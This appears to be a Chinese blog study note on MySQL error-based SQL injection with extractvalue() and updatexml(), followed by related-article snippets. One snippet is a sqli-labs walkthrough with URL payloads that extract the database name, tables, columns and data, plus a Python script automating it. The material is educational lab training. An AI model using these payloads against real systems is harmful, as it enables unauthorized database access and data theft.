学习基于extractvalue()和updatexml()的报错注入

最新推荐文章于 2025-08-30 13:44:43 发布
最新推荐文章于 2025-08-30 13:44:43 发布 · 5.1w 阅读 · 131
文章标签:

#学习笔记 #小白 #sql报错注入

extractvalue()

extractvalue() :对XML文档进行查询的函数

其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样

语法:extractvalue(目标xml文档,xml路径)

第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。

正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错

select username from security.user where id=1 and (extractvalue(‘anything’,’/x/xx’))


使用concat()拼接 ‘  /  ‘ 效果相同,

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘/’,(select database()))))

这里在’anything’中查询不到 位置是 /database()的内容,

但也没有语法错误,不会报错,下面故意写入语法错误:

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘~’,(select database()))))

可以看出,以~开头的内容不是xml格式的语法,报错,但是会显示无法识别的内容是什么,这样就达到了目的。

有一点需要注意,extractvalue()能查询字符串的最大长度为32,就是说如果我们想要的结果超过32,就需要用substring()函数截取,一次查看32位

这里查询前5位示意:

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘#’,substring(hex((select database())),1,5))))


updatexml()

updatexml()函数与extractvalue()类似,是更新xml文档的函数。

语法updatexml(目标xml文档,xml路径,更新的内容)

select username from security.user where id=1 and (updatexml(‘anything’,’/xx/xx’,’anything’))


报错方式相同:

select username from security.user where id=1 and (updatexml(‘anything’,concat(‘~’,(select database())),’anything’))

同样是32位查询。

转载指明出处

文章同步到我的博客: http://119.23.249.120/archives/256
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
update.xml
07-07
软件更新升级 <?xml version="1.0" encoding="utf-8" ?> <Update> <Soft Name="BlogWriter"> <Verson>1.0.1.2</Verson> <DownLoad>http://www.youkuaiyun.com/BlogWrite.rar</DownLoad> </Soft> </Update>
extractValue()报错注入
haishiqiguai的博客,欢迎你的到来,希望你能在此找到汝心中所求
05-04 1233
本文主要介绍了 extractValue() 报错注入的相关知识,包括其与 updatexml() 报错注入的关联、报错注入的基本概念、思路、用到的函数以及具体示例。
MySQL高级函数之:`UpdateXML()`:其在更新`XML`文档中的值时的`XPath`语法。
weixin_41455464的博客
08-30 744
对于复杂的 XML 操作或大型 XML 文档,考虑使用其他 XML 处理函数或工具,例如存储过程、用户自定义函数 (UDF) 或外部脚本。对于更复杂的 XML 操作,例如添加、删除或移动节点,可能需要使用其他 XML 处理函数或工具。函数是 MySQL 中一个强大的工具,可以用于更新 XML 文档中的值。允许我们在 MySQL 中直接操作 XML 数据,而掌握 XPath 语法是有效使用它的关键。具有一定的局限性,但在某些情况下,它可以提供一种简单而有效的 XML 数据操作方法。
24-3 SQl 注入 - 利用报错函数updatexml及extracevalue
weixin_43263566的博客
02-11 1642
改变文档中符合条件的节点,使用不同的 XML 标记匹配替换 XML 块的函数。:String 格式,为 XML 文档对象的名称。:XPath 格式的字符串,代表路径。new_value:String 格式,用于替换查找到的符合条件的数据。通过提供一个 XML 标记片段 XPath 表达式,从 XML 文档中提取值的函数。xml_frag:XML 标记片段,即 XML 文档对象。xpath_expr:XPath 表达式,用于定位需要提取的值。
SQL注入,xpath函数updatexml()extractvalue()报错注入原理
金 帛的博客
04-26 4870
SQL注入报错注入原理
报错注入extractvalue,updatexml)
m0_73477772的博客
05-10 891
但是我们将第二个参数的斜杠替换为另外的符号extractvalue(doc,'~book/author/surname')例如:concat(1,2)的作用是将1,2两个位置的数据拼接起来,0x7e是’~‘的ascll码。这时候我们在第二个参数的位置加入SQL语句,则会返回我们想要的信息。第三个参数:new_value,string格式,替换查找到的符合条件的数据。第一个参数doc XML文档对象名称,第二个参数'____' 路径。如果我们把第二个参数的路径拼写错误,它会查不到内容但不会报错
学习笔记 UpdateXml() MYSQL显错注入
weixin_33849215的博客
12-28 644
学习之前,需要先了解UpdateXml()UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,S...
几种常见的报错注入类型详解
m0_74825260的博客
12-19 1136
报错注入是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
报错注入详解
十步不敢沙人的博客
03-11 1778
SQL报错注入如何利用数据库函数窃取信息?揭秘extractvalueupdatexml等函数触发机制,附实战案例与防御方案,提升系统安全防线!
CTF-Hub SQL 报错注入(纯手动注入
m0_46745664的博客
11-26 1066
​当输入1时,发现只有查询正确,基本上可以判断出没有回显。
SQL注入报错注入
qq_45557130的博客
10-07 684
sql注入报错注入
updatexml函数
m0_62092622的博客
01-27 9785
先介绍一下updatexml函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称 第二个参数:XPath_string (Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以sql-labs第十七关为例 由于本关username过滤比较严格,所以password就成了注入点 根据报错来获取所需要的信...
mysql xml函数_MYSQL updatexml()函数报错注入解析
weixin_42188533的博客
02-27 1352
MYSQL updatexml()函数报错注入解析首先了解下updatexml()函数UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参...
sqli-labs】Less 5——报错注入updatexml()函数)
用博客做做记录的小白
06-23 3075
sqli-labs靶场第五关less 5,使用报错注入函数updatexml()进行报错注入注入类型为单引号字符型。
updatexml mysql_深入浅出带你玩转sqlilabs(四)-updatexml(),floor(),extractvalue()报错注入
weixin_39942108的博客
01-30 624
SQL各种参数类型下的注入测试数字型-sqlilabs less2前面文章已演示过字符型-sqlilabs less1前面文章已演示过搜索型-自写测试如:www.test.com/index.php?id=1www.test.com/index.php?id=abc(搜索型,一般产生在网站的搜索框)http://www.test.com/search.php?q=1区分参数类型的原因:当参数类型为...
updatexml()报错注入
haishiqiguai的博客,欢迎你的到来,希望你能在此找到汝心中所求
04-28 1703
报错注入(Error-based SQL Injection)是一种通过故意触发数据库错误,并利用错误信息中泄露的敏感数据来实施攻击的SQL注入技术。其核心原理是利用数据库的异常处理机制,将攻击者需要的数据嵌入错误信息中返回。
SQL报错注入原理-详细讲解 extractvalue()updatexml()、floor()报错原因
大大大蜜蜂的博客
10-12 6687
SQL报错注入原理 一、xpath语法格式错误的报错: mysql5.1.5版本中添加了extractvalue()updatexml()函数,它们两个分别能够对XML文档进行查询、修改操作,下面分别对这两个函数进行介绍。 这里是MYSQLextractvalue()updatexml()的官方介绍 1、extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串中提取一个值。 xml_frag:xml文档对象的名称,是一个string类型。 xpat
SQL注入漏洞学习基于sqllab靶场 报错注入利用
最新发布
09-07
报错注入SQL 注入中的一种技术,它利用数据库的错误信息来获取敏感数据。以下结合 sqli - lab 靶场介绍基于该靶场的 SQL 注入漏洞报错注入利用学习内容。 ### 报错注入原理 报错注入是利用数据库在执行非法或者异常 SQL 语句时会抛出错误信息,并且将这些错误信息返回到页面上的特性。攻击者通过构造特殊的 SQL 语句,使得数据库在处理这些语句时产生包含敏感信息(如数据库名、表名、列名、数据内容等)的错误信息,从而获取这些信息。 ### 以 sqli - lab 靶场为例的报错注入利用步骤 #### 1. 确认存在 SQL 注入漏洞 首先需要判断目标页面是否存在 SQL 注入漏洞。可以通过在 URL 参数后添加单引号 `'` 、双引号 `"` 或括号 `)` 等符号,观察页面是否返回错误信息或者页面显示异常。例如,在 sqli - lab 靶场第一关的 URL `http://bachang.cn/sqli/Less - 1/?id=1` 后面添加单引号,变为 `http://bachang.cn/sqli/Less - 1/?id=1'`。如果页面出现数据库错误信息,那么很可能存在 SQL 注入漏洞 [^1]。 #### 2. 确定数据库类型 不同的数据库产生错误信息的函数方式有所不同,所以需要先确定目标数据库的类型。常见的数据库类型有 MySQL、Oracle、SQL Server 等。对于 MySQL 数据库,可以利用一些特定的报错函数,如 `updatexml()`、`extractvalue()` 等。 #### 3. 利用报错函数获取信息 ##### 获取数据库名 使用 `updatexml()` 函数构造报错注入语句。`updatexml()` 函数用于更新 XML 文档中的数据,如果输入的 XPath 表达式无效,就会抛出错误信息,并且将我们想要获取的数据包含在错误信息中。例如在 sqli - lab 靶场第一关,构造如下 URL: ```plaintext http://bachang.cn/sqli/Less-1/?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+ ``` 其中 `0x7e` 是波浪线 `~` 的十六进制表示,用于在错误信息中标识我们获取的数据。当执行该语句时,数据库会尝试更新 XML 文档,但由于 XPath 表达式 `concat(0x7e,database(),0x7e)` 无效,会抛出错误信息,其中包含数据库名。 ##### 获取表名 获取表名时,可以结合 `information_schema.tables` 系统表。`information_schema.tables` 存储了数据库中所有表的信息。构造如下 URL: ```plaintext http://bachang.cn/sqli/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+ ``` 该语句通过 `group_concat()` 函数将当前数据库中的所有表名连接成一个字符串,并通过 `updatexml()` 函数的错误信息返回。 ##### 获取列名 获取列名时,使用 `information_schema.columns` 系统表,它存储了数据库中所有列的信息。构造如下 URL: ```plaintext http://bachang.cn/sqli/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='要查询的表名'),0x7e),1) --+ ``` 将 `'要查询的表名'` 替换为前面获取到的实际表名,就可以获取该表的所有列名。 ##### 获取数据 获取数据时,根据前面获取到的表名列名,构造相应的查询语句。例如: ```plaintext http://bachang.cn/sqli/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(列名) from 表名),0x7e),1) --+ ``` 将 `列名` `表名` 替换为实际的列名表名,就可以获取该表中该列的数据。 ### 注意事项 - 在实际操作中,要注意 URL 的编码问题,某些特殊字符可能需要进行 URL 编码后才能正常使用。 - 不同版本的数据库对报错函数的支持可能有所不同,需要根据实际情况选择合适的函数。 - 进行 SQL 注入测试应该在合法的授权环境下进行,如自己搭建的测试靶场,避免对他人的系统造成破坏。 ### 代码示例 以下是一个简单的 Python 脚本示例,用于自动执行报错注入并获取数据库名: ```python import requests url = "http://bachang.cn/sqli/Less-1/" payload = "?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+" full_url = url + payload response = requests.get(full_url) if response.status_code == 200: content = response.text if "~" in content: start_index = content.index("~") + 1 end_index = content.index("~", start_index) database_name = content[start_index:end_index] print(f"获取到的数据库名: {database_name}") else: print("未获取到数据库名") else: print("请求失败") ``` ### 总结 通过以上步骤,可以在 sqli - lab 靶场中学习基于 SQL 注入漏洞的报错注入利用。从确认漏洞存在,到确定数据库类型,再到利用报错函数逐步获取数据库名、表名、列名数据,最后可以使用脚本自动化执行注入过程,提高效率。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值